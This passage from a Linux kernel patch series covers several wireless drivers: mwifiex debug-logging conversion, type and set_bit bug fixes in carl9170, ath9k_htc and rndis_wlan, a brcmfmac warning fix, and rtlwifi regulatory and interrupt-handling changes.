%p\n", ra_list); + mwifiex_dbg(adapter, INFO, "info: allocated ra_list %p\n", ra_list); return ra_list; } @@ -150,7 +150,8 @@ void mwifiex_ralist_add(struct mwifiex_private *priv, const u8 *ra) for (i = 0; i < MAX_NUM_TID; ++i) { ra_list = mwifiex_wmm_allocate_ralist_node(adapter, ra); - dev_dbg(adapter->dev, "info: created ra_list %p\n", ra_list); + mwifiex_dbg(adapter, INFO, + "info: created ra_list %p\n", ra_list); if (!ra_list) break; @@ -178,8 +179,8 @@ void mwifiex_ralist_add(struct mwifiex_private *priv, const u8 *ra) spin_unlock_irqrestore(&priv->sta_list_spinlock, flags); } - dev_dbg(adapter->dev, "data: ralist %p: is_11n_enabled=%d\n", - ra_list, ra_list->is_11n_enabled); + mwifiex_dbg(adapter, DATA, "data: 
ralist %p: is_11n_enabled=%d\n", + ra_list, ra_list->is_11n_enabled); if (ra_list->is_11n_enabled) { ra_list->ba_pkt_count = 0; @@ -241,11 +242,12 @@ mwifiex_wmm_setup_queue_priorities(struct mwifiex_private *priv, return; } - dev_dbg(priv->adapter->dev, "info: WMM Parameter IE: version=%d, " - "qos_info Parameter Set Count=%d, Reserved=%#x\n", - wmm_ie->vend_hdr.version, wmm_ie->qos_info_bitmap & - IEEE80211_WMM_IE_AP_QOSINFO_PARAM_SET_CNT_MASK, - wmm_ie->reserved); + mwifiex_dbg(priv->adapter, INFO, + "info: WMM Parameter IE: version=%d,\t" + "qos_info Parameter Set Count=%d, Reserved=%#x\n", + wmm_ie->vend_hdr.version, wmm_ie->qos_info_bitmap & + IEEE80211_WMM_IE_AP_QOSINFO_PARAM_SET_CNT_MASK, + wmm_ie->reserved); for (num_ac = 0; num_ac < ARRAY_SIZE(wmm_ie->ac_params); num_ac++) { u8 ecw = wmm_ie->ac_params[num_ac].ecw_bitmap; @@ -257,10 +259,10 @@ mwifiex_wmm_setup_queue_priorities(struct mwifiex_private *priv, priv->wmm.queue_priority[ac_idx] = ac_idx; tmp[ac_idx] = avg_back_off; - dev_dbg(priv->adapter->dev, - "info: WMM: CWmax=%d CWmin=%d Avg Back-off=%d\n", - (1 << ((ecw & MWIFIEX_ECW_MAX) >> 4)) - 1, - cw_min, avg_back_off); + mwifiex_dbg(priv->adapter, INFO, + "info: WMM: CWmax=%d CWmin=%d Avg Back-off=%d\n", + (1 << ((ecw & MWIFIEX_ECW_MAX) >> 4)) - 1, + cw_min, avg_back_off); mwifiex_wmm_ac_debug_print(&wmm_ie->ac_params[num_ac]); } @@ -333,8 +335,8 @@ mwifiex_wmm_setup_ac_downgrade(struct mwifiex_private *priv) { int ac_val; - dev_dbg(priv->adapter->dev, "info: WMM: AC Priorities:" - "BK(0), BE(1), VI(2), VO(3)\n"); + mwifiex_dbg(priv->adapter, INFO, "info: WMM: AC Priorities:\t" + "BK(0), BE(1), VI(2), VO(3)\n"); if (!priv->wmm_enabled) { /* WMM is not enabled, default priorities */ @@ -346,9 +348,10 @@ mwifiex_wmm_setup_ac_downgrade(struct mwifiex_private *priv) priv->wmm.ac_down_graded_vals[ac_val] = mwifiex_wmm_eval_downgrade_ac(priv, (enum mwifiex_wmm_ac_e) ac_val); - dev_dbg(priv->adapter->dev, - "info: WMM: AC PRIO %d maps to %d\n", - ac_val, priv->wmm.ac_down_graded_vals[ac_val]); + mwifiex_dbg(priv->adapter, INFO, + "info: WMM: AC PRIO %d maps to %d\n", + ac_val, + priv->wmm.ac_down_graded_vals[ac_val]); } } } @@ -521,8 +524,8 @@ static void mwifiex_wmm_delete_all_ralist(struct mwifiex_private *priv) int i; for (i = 0; i < MAX_NUM_TID; ++i) { - dev_dbg(priv->adapter->dev, - "info: ra_list: freeing buf for tid %d\n", i); + mwifiex_dbg(priv->adapter, INFO, + "info: ra_list: freeing buf for tid %d\n", i); list_for_each_entry_safe(ra_list, tmp_node, &priv->wmm.tid_tbl_ptr[i].ra_list, list) { @@ -694,14 +697,15 @@ mwifiex_wmm_add_buf_txqueue(struct mwifiex_private *priv, if (GET_BSS_ROLE(priv) == MWIFIEX_BSS_ROLE_STA && ISSUPP_TDLS_ENABLED(adapter->fw_cap_info)) { if (ntohs(eth_hdr->h_proto) == ETH_P_TDLS) - dev_dbg(adapter->dev, - "TDLS setup packet for %pM. 
Don't block\n", ra); + mwifiex_dbg(adapter, DATA, + "TDLS setup packet for %pM.\t" + "Don't block\n", ra); else if (memcmp(priv->cfg_bssid, ra, ETH_ALEN)) tdls_status = mwifiex_get_tdls_link_status(priv, ra); } if (!priv->media_connected && !mwifiex_is_skb_mgmt_frame(skb)) { - dev_dbg(adapter->dev, "data: drop packet in disconnect\n"); + mwifiex_dbg(adapter, DATA, "data: drop packet in disconnect\n"); mwifiex_write_data_complete(adapter, skb, 0, -1); return; } @@ -782,6 +786,7 @@ int mwifiex_ret_wmm_get_status(struct mwifiex_private *priv, { u8 *curr = (u8 *) &resp->params.get_wmm_status; uint16_t resp_len = le16_to_cpu(resp->size), tlv_len; + int mask = IEEE80211_WMM_IE_AP_QOSINFO_PARAM_SET_CNT_MASK; bool valid = true; struct mwifiex_ie_types_data *tlv_hdr; @@ -789,8 +794,9 @@ int mwifiex_ret_wmm_get_status(struct mwifiex_private *priv, struct ieee_types_wmm_parameter *wmm_param_ie = NULL; struct mwifiex_wmm_ac_status *ac_status; - dev_dbg(priv->adapter->dev, "info: WMM: WMM_GET_STATUS cmdresp received: %d\n", - resp_len); + mwifiex_dbg(priv->adapter, INFO, + "info: WMM: WMM_GET_STATUS cmdresp received: %d\n", + resp_len); while ((resp_len >= sizeof(tlv_hdr->header)) && valid) { tlv_hdr = (struct mwifiex_ie_types_data *) curr; @@ -804,12 +810,12 @@ int mwifiex_ret_wmm_get_status(struct mwifiex_private *priv, tlv_wmm_qstatus = (struct mwifiex_ie_types_wmm_queue_status *) tlv_hdr; - dev_dbg(priv->adapter->dev, - "info: CMD_RESP: WMM_GET_STATUS:" - " QSTATUS TLV: %d, %d, %d\n", - tlv_wmm_qstatus->queue_index, - tlv_wmm_qstatus->flow_required, - tlv_wmm_qstatus->disabled); + mwifiex_dbg(priv->adapter, CMD, + "info: CMD_RESP: WMM_GET_STATUS:\t" + "QSTATUS TLV: %d, %d, %d\n", + tlv_wmm_qstatus->queue_index, + tlv_wmm_qstatus->flow_required, + tlv_wmm_qstatus->disabled); ac_status = &priv->wmm.ac_status[tlv_wmm_qstatus-> queue_index]; @@ -832,11 +838,10 @@ int mwifiex_ret_wmm_get_status(struct mwifiex_private *priv, wmm_param_ie->vend_hdr.element_id = WLAN_EID_VENDOR_SPECIFIC; - dev_dbg(priv->adapter->dev, - "info: CMD_RESP: WMM_GET_STATUS:" - " WMM Parameter Set Count: %d\n", - wmm_param_ie->qos_info_bitmap & - IEEE80211_WMM_IE_AP_QOSINFO_PARAM_SET_CNT_MASK); + mwifiex_dbg(priv->adapter, CMD, + "info: CMD_RESP: WMM_GET_STATUS:\t" + "WMM Parameter Set Count: %d\n", + wmm_param_ie->qos_info_bitmap & mask); memcpy((u8 *) &priv->curr_bss_params.bss_descriptor. 
wmm_ie, wmm_param_ie, @@ -884,9 +889,9 @@ mwifiex_wmm_process_association_req(struct mwifiex_private *priv, if (!wmm_ie) return 0; - dev_dbg(priv->adapter->dev, - "info: WMM: process assoc req: bss->wmm_ie=%#x\n", - wmm_ie->vend_hdr.element_id); + mwifiex_dbg(priv->adapter, INFO, + "info: WMM: process assoc req: bss->wmm_ie=%#x\n", + wmm_ie->vend_hdr.element_id); if ((priv->wmm_required || (ht_cap && (priv->adapter->config_bands & BAND_GN || @@ -936,8 +941,8 @@ mwifiex_wmm_compute_drv_pkt_delay(struct mwifiex_private *priv, */ ret_val = (u8) (min(queue_delay, priv->wmm.drv_pkt_delay_max) >> 1); - dev_dbg(priv->adapter->dev, "data: WMM: Pkt Delay: %d ms," - " %d ms sent to FW\n", queue_delay, ret_val); + mwifiex_dbg(priv->adapter, DATA, "data: WMM: Pkt Delay: %d ms,\t" + "%d ms sent to FW\n", queue_delay, ret_val); return ret_val; } @@ -1091,14 +1096,15 @@ mwifiex_send_single_packet(struct mwifiex_private *priv, if (skb_queue_empty(&ptr->skb_head)) { spin_unlock_irqrestore(&priv->wmm.ra_list_spinlock, ra_list_flags); - dev_dbg(adapter->dev, "data: nothing to send\n"); + mwifiex_dbg(adapter, DATA, "data: nothing to send\n"); return; } skb = skb_dequeue(&ptr->skb_head); tx_info = MWIFIEX_SKB_TXCB(skb); - dev_dbg(adapter->dev, "data: dequeuing the packet %p %p\n", ptr, skb); + mwifiex_dbg(adapter, DATA, + "data: dequeuing the packet %p %p\n", ptr, skb); ptr->total_pkt_count--; @@ -1214,7 +1220,7 @@ mwifiex_send_processed_packet(struct mwifiex_private *priv, switch (ret) { case -EBUSY: - dev_dbg(adapter->dev, "data: -EBUSY is returned\n"); + mwifiex_dbg(adapter, ERROR, "data: -EBUSY is returned\n"); spin_lock_irqsave(&priv->wmm.ra_list_spinlock, ra_list_flags); if (!mwifiex_is_ralist_valid(priv, ptr, ptr_index)) { @@ -1233,7 +1239,7 @@ mwifiex_send_processed_packet(struct mwifiex_private *priv, case -1: if (adapter->iface_type != MWIFIEX_PCIE) adapter->data_sent = false; - dev_err(adapter->dev, "host_to_card failed: %#x\n", ret); + mwifiex_dbg(adapter, ERROR, "host_to_card failed: %#x\n", ret); adapter->dbg.num_tx_host_to_card_failure++; mwifiex_write_data_complete(adapter, skb, 0, ret); break; @@ -1272,7 +1278,7 @@ mwifiex_dequeue_tx_packet(struct mwifiex_adapter *adapter) tid = mwifiex_get_tid(ptr); - dev_dbg(adapter->dev, "data: tid=%d\n", tid); + mwifiex_dbg(adapter, DATA, "data: tid=%d\n", tid); spin_lock_irqsave(&priv->wmm.ra_list_spinlock, flags); if (!mwifiex_is_ralist_valid(priv, ptr, ptr_index)) { From 4b3e845a0927c5c660f38330522b8089edcd7c40 Mon Sep 17 00:00:00 2001 From: Nicholas Mc Guire Date: Tue, 12 May 2015 20:18:38 +0200 Subject: [PATCH 206/872] carl9170: match wait_for_completion_timeout return type Return type of wait_for_completion_timeout is unsigned long not int. An appropriately named unsigned long is added, and the assignments as well as error checking fixed up. 
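For illustration only, the corrected calling pattern is roughly the sketch below (condensed from the hunk further down; 'ar', 'err' and the error label are the driver's existing names):

    unsigned long time_left;

    /* returns the remaining jiffies, or 0 if the wait timed out */
    time_left = wait_for_completion_timeout(&ar->cmd_wait, HZ);
    if (time_left == 0) {
            err = -ETIMEDOUT;       /* the int 'err' now only carries error codes */
            goto err_unbuf;
    }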
API conformance testing for completions with coccinelle spatches are being used to locate API usage inconsistencies: ./drivers/net/wireless/ath/carl9170/usb.c:675 int return assigned to unsigned long Patch was compile tested with x86_64_defconfig + CONFIG_ATH_CARDS=m, CONFIG_CARL9170=m Patch is against 4.1-rc3 (localversion-next is -next-20150512) Signed-off-by: Nicholas Mc Guire Acked-by: Christian Lamparter Signed-off-by: Kalle Valo --- drivers/net/wireless/ath/carl9170/usb.c | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/drivers/net/wireless/ath/carl9170/usb.c b/drivers/net/wireless/ath/carl9170/usb.c index c9f93310c0d6..76842e6ca38e 100644 --- a/drivers/net/wireless/ath/carl9170/usb.c +++ b/drivers/net/wireless/ath/carl9170/usb.c @@ -651,6 +651,7 @@ int carl9170_exec_cmd(struct ar9170 *ar, const enum carl9170_cmd_oids cmd, unsigned int plen, void *payload, unsigned int outlen, void *out) { int err = -ENOMEM; + unsigned long time_left; if (!IS_ACCEPTING_CMD(ar)) return -EIO; @@ -672,8 +673,8 @@ int carl9170_exec_cmd(struct ar9170 *ar, const enum carl9170_cmd_oids cmd, err = __carl9170_exec_cmd(ar, &ar->cmd, false); if (!(cmd & CARL9170_CMD_ASYNC_FLAG)) { - err = wait_for_completion_timeout(&ar->cmd_wait, HZ); - if (err == 0) { + time_left = wait_for_completion_timeout(&ar->cmd_wait, HZ); + if (time_left == 0) { err = -ETIMEDOUT; goto err_unbuf; } From 22f44150aad7a1d6b074ab6cf59abee61c7187c6 Mon Sep 17 00:00:00 2001 From: Arnd Bergmann Date: Tue, 12 May 2015 23:54:25 +0200 Subject: [PATCH 207/872] brcmfmac: avoid gcc-5.1 warning gcc-5.0 gained a new warning in the fwsignal portion of the brcmfmac driver: drivers/net/wireless/brcm80211/brcmfmac/fwsignal.c: In function 'brcmf_fws_txs_process': drivers/net/wireless/brcm80211/brcmfmac/fwsignal.c:1478:8: warning: 'skb' may be used uninitialized in this function [-Wmaybe-uninitialized] This is a false positive, and marking the brcmf_fws_hanger_poppkt function as 'static inline' makes the warning go away. I have checked the object file output and while a little code gets moved around, the size of the binary remains identical. Signed-off-by: Arnd Bergmann Signed-off-by: Kalle Valo --- drivers/net/wireless/brcm80211/brcmfmac/fwsignal.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/net/wireless/brcm80211/brcmfmac/fwsignal.c b/drivers/net/wireless/brcm80211/brcmfmac/fwsignal.c index f0dda0ecd23b..5017eaa4af45 100644 --- a/drivers/net/wireless/brcm80211/brcmfmac/fwsignal.c +++ b/drivers/net/wireless/brcm80211/brcmfmac/fwsignal.c @@ -635,7 +635,7 @@ static int brcmf_fws_hanger_pushpkt(struct brcmf_fws_hanger *h, return 0; } -static int brcmf_fws_hanger_poppkt(struct brcmf_fws_hanger *h, +static inline int brcmf_fws_hanger_poppkt(struct brcmf_fws_hanger *h, u32 slot_id, struct sk_buff **pktout, bool remove_item) { From 191f1aeeb93bb58e56f4d1868294ae22f3f67d4e Mon Sep 17 00:00:00 2001 From: Dan Carpenter Date: Thu, 14 May 2015 11:34:48 +0300 Subject: [PATCH 208/872] ath9k_htc: memory corruption calling set_bit() In d8a2c51cdcae ('ath9k_htc: Use atomic operations for op_flags') we changed things like this: - if (priv->op_flags & OP_TSF_RESET) { + if (test_bit(OP_TSF_RESET, &priv->op_flags)) { The problem is that test_bit() takes a bit number and not a mask. It means that when we do: set_bit(OP_TSF_RESET, &priv->op_flags); Then it sets the (1 << 6) bit instead of the 6 bit so we are setting a bit which is past the end of the unsigned long. 
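To make the mix-up concrete (a hedged illustration; the numbers simply follow from the old and new defines, no extra driver code is assumed):

    /* old define: OP_TSF_RESET was BIT(6) == 64, but set_bit() wants a bit index */
    set_bit(OP_TSF_RESET, &priv->op_flags);   /* touched bit 64 - out of range */

    /* new define: OP_TSF_RESET is plain 6 */
    set_bit(OP_TSF_RESET, &priv->op_flags);   /* sets bit 6, as intended */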
Fixes: d8a2c51cdcae ('ath9k_htc: Use atomic operations for op_flags') Signed-off-by: Dan Carpenter Signed-off-by: Kalle Valo --- drivers/net/wireless/ath/ath9k/htc.h | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/drivers/net/wireless/ath/ath9k/htc.h b/drivers/net/wireless/ath/ath9k/htc.h index e82a0d4ce23f..5dbc617ecf8a 100644 --- a/drivers/net/wireless/ath/ath9k/htc.h +++ b/drivers/net/wireless/ath/ath9k/htc.h @@ -440,9 +440,9 @@ static inline void ath9k_htc_stop_btcoex(struct ath9k_htc_priv *priv) } #endif /* CONFIG_ATH9K_BTCOEX_SUPPORT */ -#define OP_BT_PRIORITY_DETECTED BIT(3) -#define OP_BT_SCAN BIT(4) -#define OP_TSF_RESET BIT(6) +#define OP_BT_PRIORITY_DETECTED 3 +#define OP_BT_SCAN 4 +#define OP_TSF_RESET 6 enum htc_op_flags { HTC_FWFLAG_NO_RMW, From e3958e9d60b4570fff709f397ef5c6b8483f40f7 Mon Sep 17 00:00:00 2001 From: Dan Carpenter Date: Thu, 14 May 2015 11:37:50 +0300 Subject: [PATCH 209/872] rndis_wlan: harmless issue calling set_bit() These are used like: set_bit(WORK_LINK_UP, &priv->work_pending); The problem is that set_bit() takes the actual bit number and not a mask so static checkers get upset. It doesn't affect run time because we do it consistently, but we may as well clean it up. Fixes: 6010ce07a66c ('rndis_wlan: do link-down state change in worker thread') Signed-off-by: Dan Carpenter Signed-off-by: Kalle Valo --- drivers/net/wireless/rndis_wlan.c | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/drivers/net/wireless/rndis_wlan.c b/drivers/net/wireless/rndis_wlan.c index d72ff8e7125d..96175a7af165 100644 --- a/drivers/net/wireless/rndis_wlan.c +++ b/drivers/net/wireless/rndis_wlan.c @@ -356,9 +356,9 @@ struct ndis_80211_pmkid { #define CAP_MODE_80211G 4 #define CAP_MODE_MASK 7 -#define WORK_LINK_UP (1<<0) -#define WORK_LINK_DOWN (1<<1) -#define WORK_SET_MULTICAST_LIST (1<<2) +#define WORK_LINK_UP 0 +#define WORK_LINK_DOWN 1 +#define WORK_SET_MULTICAST_LIST 2 #define RNDIS_WLAN_ALG_NONE 0 #define RNDIS_WLAN_ALG_WEP (1<<0) From 02b5fffbe9e02f5d63fa4a801fb807cf0aab4fc9 Mon Sep 17 00:00:00 2001 From: Shao Fu Date: Fri, 15 May 2015 16:32:59 -0500 Subject: [PATCH 210/872] rtlwifi: Update regulatory database Driver rtlwifi maintains its own regulatory information, The Chrome Autotest (https://www.chromium.org/chromium-os/testing/autotest-user-doc) showed some errors. This patch adds the necessary information for rtlwifi. 
Signed-off-by: Shao Fu Signed-off-by: Larry Finger Signed-off-by: Kalle Valo --- drivers/net/wireless/rtlwifi/regd.c | 42 ++++++++++++++++++++++++++--- drivers/net/wireless/rtlwifi/regd.h | 1 + 2 files changed, 39 insertions(+), 4 deletions(-) diff --git a/drivers/net/wireless/rtlwifi/regd.c b/drivers/net/wireless/rtlwifi/regd.c index 1893d01b9e78..a62bf0a65c32 100644 --- a/drivers/net/wireless/rtlwifi/regd.c +++ b/drivers/net/wireless/rtlwifi/regd.c @@ -40,6 +40,7 @@ static struct country_code_to_enum_rd allCountries[] = { {COUNTRY_CODE_GLOBAL_DOMAIN, "JP"}, {COUNTRY_CODE_WORLD_WIDE_13, "EC"}, {COUNTRY_CODE_TELEC_NETGEAR, "EC"}, + {COUNTRY_CODE_WORLD_WIDE_13_5G_ALL, "US"}, }; /* @@ -124,6 +125,17 @@ static const struct ieee80211_regdomain rtl_regdom_14_60_64 = { } }; +static const struct ieee80211_regdomain rtl_regdom_12_13_5g_all = { + .n_reg_rules = 4, + .alpha2 = "99", + .reg_rules = { + RTL819x_2GHZ_CH01_11, + RTL819x_2GHZ_CH12_13, + RTL819x_5GHZ_5150_5350, + RTL819x_5GHZ_5470_5850, + } +}; + static const struct ieee80211_regdomain rtl_regdom_14 = { .n_reg_rules = 3, .alpha2 = "99", @@ -348,6 +360,8 @@ static const struct ieee80211_regdomain *_rtl_regdomain_select( return &rtl_regdom_14_60_64; case COUNTRY_CODE_GLOBAL_DOMAIN: return &rtl_regdom_14; + case COUNTRY_CODE_WORLD_WIDE_13_5G_ALL: + return &rtl_regdom_12_13_5g_all; default: return &rtl_regdom_no_midband; } @@ -384,6 +398,25 @@ static struct country_code_to_enum_rd *_rtl_regd_find_country(u16 countrycode) return NULL; } +static u8 channel_plan_to_country_code(u8 channelplan) +{ + switch (channelplan) { + case 0x20: + case 0x21: + return COUNTRY_CODE_WORLD_WIDE_13; + case 0x22: + return COUNTRY_CODE_IC; + case 0x32: + return COUNTRY_CODE_TELEC_NETGEAR; + case 0x41: + return COUNTRY_CODE_GLOBAL_DOMAIN; + case 0x7f: + return COUNTRY_CODE_WORLD_WIDE_13_5G_ALL; + default: + return COUNTRY_CODE_MAX; /*Error*/ + } +} + int rtl_regd_init(struct ieee80211_hw *hw, void (*reg_notifier)(struct wiphy *wiphy, struct regulatory_request *request)) @@ -396,11 +429,12 @@ int rtl_regd_init(struct ieee80211_hw *hw, return -EINVAL; /* init country_code from efuse channel plan */ - rtlpriv->regd.country_code = rtlpriv->efuse.channel_plan; + rtlpriv->regd.country_code = + channel_plan_to_country_code(rtlpriv->efuse.channel_plan); - RT_TRACE(rtlpriv, COMP_REGD, DBG_TRACE, - "rtl: EEPROM regdomain: 0x%0x\n", - rtlpriv->regd.country_code); + RT_TRACE(rtlpriv, COMP_REGD, DBG_DMESG, + "rtl: EEPROM regdomain: 0x%0x conuntry code: %d\n", + rtlpriv->efuse.channel_plan, rtlpriv->regd.country_code); if (rtlpriv->regd.country_code >= COUNTRY_CODE_MAX) { RT_TRACE(rtlpriv, COMP_REGD, DBG_DMESG, diff --git a/drivers/net/wireless/rtlwifi/regd.h b/drivers/net/wireless/rtlwifi/regd.h index 3bbbaaa68530..f7f15bce35dd 100644 --- a/drivers/net/wireless/rtlwifi/regd.h +++ b/drivers/net/wireless/rtlwifi/regd.h @@ -49,6 +49,7 @@ enum country_code_type_t { COUNTRY_CODE_GLOBAL_DOMAIN = 10, COUNTRY_CODE_WORLD_WIDE_13 = 11, COUNTRY_CODE_TELEC_NETGEAR = 12, + COUNTRY_CODE_WORLD_WIDE_13_5G_ALL = 13, /*add new channel plan above this line */ COUNTRY_CODE_MAX From 852ce7805638e3202578b6265b40bfe36b20c1c4 Mon Sep 17 00:00:00 2001 From: Shao Fu Date: Fri, 15 May 2015 16:33:00 -0500 Subject: [PATCH 211/872] rtlwifi: rtl8188ee: Apply the new regulatory information The driver was setting a channel plan for the world. Now it reads it from EEPROM. 
Signed-off-by: Shao Fu Signed-off-by: Larry Finger Signed-off-by: Kalle Valo --- drivers/net/wireless/rtlwifi/rtl8188ee/hw.c | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/drivers/net/wireless/rtlwifi/rtl8188ee/hw.c b/drivers/net/wireless/rtlwifi/rtl8188ee/hw.c index 86ce5b1930e6..40c65b742b61 100644 --- a/drivers/net/wireless/rtlwifi/rtl8188ee/hw.c +++ b/drivers/net/wireless/rtlwifi/rtl8188ee/hw.c @@ -1919,8 +1919,8 @@ static void _rtl88ee_read_adapter_info(struct ieee80211_hw *hw) "dev_addr: %pM\n", rtlefuse->dev_addr); /*channel plan */ rtlefuse->eeprom_channelplan = hwinfo[EEPROM_CHANNELPLAN]; - /* set channel paln to world wide 13 */ - rtlefuse->channel_plan = COUNTRY_CODE_WORLD_WIDE_13; + /* set channel plan from efuse */ + rtlefuse->channel_plan = rtlefuse->eeprom_channelplan; /*tx power*/ _rtl88ee_read_txpower_info_from_hwpg(hw, rtlefuse->autoload_failflag, From 5620302484d4ef71be0361bea086770d24a73e47 Mon Sep 17 00:00:00 2001 From: Shao Fu Date: Fri, 15 May 2015 16:33:01 -0500 Subject: [PATCH 212/872] rtlwifi: rtl8192ee: Apply the regulatory changes to driver The driver was setting a channel plan for the world. Now it reads it from EEPROM. In addition, a typo was fixed. Signed-off-by: Shao Fu Signed-off-by: Larry Finger Signed-off-by: Kalle Valo --- drivers/net/wireless/rtlwifi/rtl8192ee/hw.c | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/drivers/net/wireless/rtlwifi/rtl8192ee/hw.c b/drivers/net/wireless/rtlwifi/rtl8192ee/hw.c index da0a6125f314..0705e7e3def0 100644 --- a/drivers/net/wireless/rtlwifi/rtl8192ee/hw.c +++ b/drivers/net/wireless/rtlwifi/rtl8192ee/hw.c @@ -2194,8 +2194,8 @@ static void _rtl92ee_read_adapter_info(struct ieee80211_hw *hw) "dev_addr: %pM\n", rtlefuse->dev_addr); /*channel plan */ rtlefuse->eeprom_channelplan = *(u8 *)&hwinfo[EEPROM_CHANNELPLAN]; - /* set channel paln to world wide 13 */ - rtlefuse->channel_plan = COUNTRY_CODE_WORLD_WIDE_13; + /* set channel plan from efuse */ + rtlefuse->channel_plan = rtlefuse->eeprom_channelplan; /*tx power*/ _rtl92ee_read_txpower_info_from_hwpg(hw, rtlefuse->autoload_failflag, hwinfo); From b23cd22d3923b11e4a8fd1854b52932ac691d7ac Mon Sep 17 00:00:00 2001 From: Shao Fu Date: Fri, 15 May 2015 16:33:02 -0500 Subject: [PATCH 213/872] rtlwifi: rtl8723be: Update driver for regulatory changes The driver is converted to use the channel plan in the EEPROM. Signed-off-by: Shao Fu Signed-off-by: Larry Finger Signed-off-by: Kalle Valo --- drivers/net/wireless/rtlwifi/rtl8723be/hw.c | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/drivers/net/wireless/rtlwifi/rtl8723be/hw.c b/drivers/net/wireless/rtlwifi/rtl8723be/hw.c index b681af3c7a35..e0f679bbcdaf 100644 --- a/drivers/net/wireless/rtlwifi/rtl8723be/hw.c +++ b/drivers/net/wireless/rtlwifi/rtl8723be/hw.c @@ -2139,8 +2139,8 @@ static void _rtl8723be_read_adapter_info(struct ieee80211_hw *hw, RT_TRACE(rtlpriv, COMP_INIT, DBG_LOUD, "EEPROM Customer ID: 0x%2x\n", rtlefuse->eeprom_oemid); - /* set channel plan to world wide 13 */ - rtlefuse->channel_plan = COUNTRY_CODE_WORLD_WIDE_13; + /* set channel plan from efuse */ + rtlefuse->channel_plan = rtlefuse->eeprom_channelplan; if (rtlhal->oem_id == RT_CID_DEFAULT) { /* Does this one have a Toshiba SMID from group 1? */ From d10101a603727474eb7ee16c1b46dcb4931a2dac Mon Sep 17 00:00:00 2001 From: Shao Fu Date: Fri, 15 May 2015 16:33:03 -0500 Subject: [PATCH 214/872] rtlwifi: rtl8821ae: Fix problem with regulatory information The driver was not setting a channel plan.
Now it gets it from EEPROM. Signed-off-by: Shao Fu Signed-off-by: Larry Finger Signed-off-by: Kalle Valo --- drivers/net/wireless/rtlwifi/rtl8821ae/hw.c | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/drivers/net/wireless/rtlwifi/rtl8821ae/hw.c b/drivers/net/wireless/rtlwifi/rtl8821ae/hw.c index 8704eee9f3a4..450bd4d743d0 100644 --- a/drivers/net/wireless/rtlwifi/rtl8821ae/hw.c +++ b/drivers/net/wireless/rtlwifi/rtl8821ae/hw.c @@ -3232,8 +3232,8 @@ static void _rtl8821ae_read_adapter_info(struct ieee80211_hw *hw, bool b_pseudo_ if (rtlefuse->eeprom_channelplan == 0xff) rtlefuse->eeprom_channelplan = 0x7F; - /* set channel paln to world wide 13 */ - /* rtlefuse->channel_plan = (u8)rtlefuse->eeprom_channelplan; */ + /* set channel plan from efuse */ + rtlefuse->channel_plan = rtlefuse->eeprom_channelplan; /*parse xtal*/ rtlefuse->crystalcap = hwinfo[EEPROM_XTAL_8821AE]; From 1277fa2ab2f9a624a4b0177119ca13b5fd65edd0 Mon Sep 17 00:00:00 2001 From: Vincent Fann Date: Fri, 15 May 2015 21:29:27 -0500 Subject: [PATCH 215/872] rtlwifi: Remove the clear interrupt routine from all drivers Several of these drivers have their TX randomly blocked for 3~5 seconds while measuring TX throughput (iperf). The root cause lies in rtl_pci_flush(). The function uses a while-loop to wait for the TX queue length to decrease to 0. The TX queue length counts the number of packets that are queued in the driver. The driver relies on the TX OK interrupt to return skbs and reduce the TX queue length. The interrupt subroutine disables interrupts, reads the interrupt registers, and then clears the registers in the beginning of _rtl_pci_interrupt(). After all interrupt processing is finished, the driver invokes enable_interrupt() to enable interrupts. This behavior is normal for an interrupt subroutine. But enable_interrupt() invokes clear_interrupt() again. This unexpected interrupt clearing may clear fresh TX OK interrupts. These missing interrupts cause the TX queue length to never reach 0, which leaves rtl_pci_flush() stuck in an unterminated while-loop. This patch removes clear_interrupt() from enable_interrupt() to avoid this behavior.
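Roughly, the rtl8188ee enable path ends up as the sketch below after the change (condensed from the hunk that follows; the other chips are modified the same way):

    void rtl88ee_enable_interrupt(struct ieee80211_hw *hw)
    {
            struct rtl_priv *rtlpriv = rtl_priv(hw);
            struct rtl_pci *rtlpci = rtl_pcidev(rtl_pcipriv(hw));

            /* no clear_interrupt() here any more: HISR/HISRE are only acked
             * inside the ISR itself, so a TX OK interrupt that fires while
             * interrupts are being re-enabled is no longer discarded */
            rtl_write_dword(rtlpriv, REG_HIMR, rtlpci->irq_mask[0] & 0xFFFFFFFF);
            rtl_write_dword(rtlpriv, REG_HIMRE, rtlpci->irq_mask[1] & 0xFFFFFFFF);
            rtlpci->irq_enabled = true;
    }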
Signed-off-by: Vincent Fann Signed-off-by: Shao Fu Signed-off-by: Larry Finger Cc: Stable [3.18+] Signed-off-by: Kalle Valo --- drivers/net/wireless/rtlwifi/rtl8188ee/hw.c | 16 ---------------- drivers/net/wireless/rtlwifi/rtl8192ee/hw.c | 17 ----------------- drivers/net/wireless/rtlwifi/rtl8723ae/hw.c | 13 ------------- drivers/net/wireless/rtlwifi/rtl8723be/hw.c | 17 ----------------- drivers/net/wireless/rtlwifi/rtl8821ae/hw.c | 20 -------------------- 5 files changed, 83 deletions(-) diff --git a/drivers/net/wireless/rtlwifi/rtl8188ee/hw.c b/drivers/net/wireless/rtlwifi/rtl8188ee/hw.c index 40c65b742b61..8ee83b093c0d 100644 --- a/drivers/net/wireless/rtlwifi/rtl8188ee/hw.c +++ b/drivers/net/wireless/rtlwifi/rtl8188ee/hw.c @@ -1354,27 +1354,11 @@ void rtl88ee_set_qos(struct ieee80211_hw *hw, int aci) } } -static void rtl88ee_clear_interrupt(struct ieee80211_hw *hw) -{ - struct rtl_priv *rtlpriv = rtl_priv(hw); - u32 tmp; - - tmp = rtl_read_dword(rtlpriv, REG_HISR); - rtl_write_dword(rtlpriv, REG_HISR, tmp); - - tmp = rtl_read_dword(rtlpriv, REG_HISRE); - rtl_write_dword(rtlpriv, REG_HISRE, tmp); - - tmp = rtl_read_dword(rtlpriv, REG_HSISR); - rtl_write_dword(rtlpriv, REG_HSISR, tmp); -} - void rtl88ee_enable_interrupt(struct ieee80211_hw *hw) { struct rtl_priv *rtlpriv = rtl_priv(hw); struct rtl_pci *rtlpci = rtl_pcidev(rtl_pcipriv(hw)); - rtl88ee_clear_interrupt(hw);/*clear it here first*/ 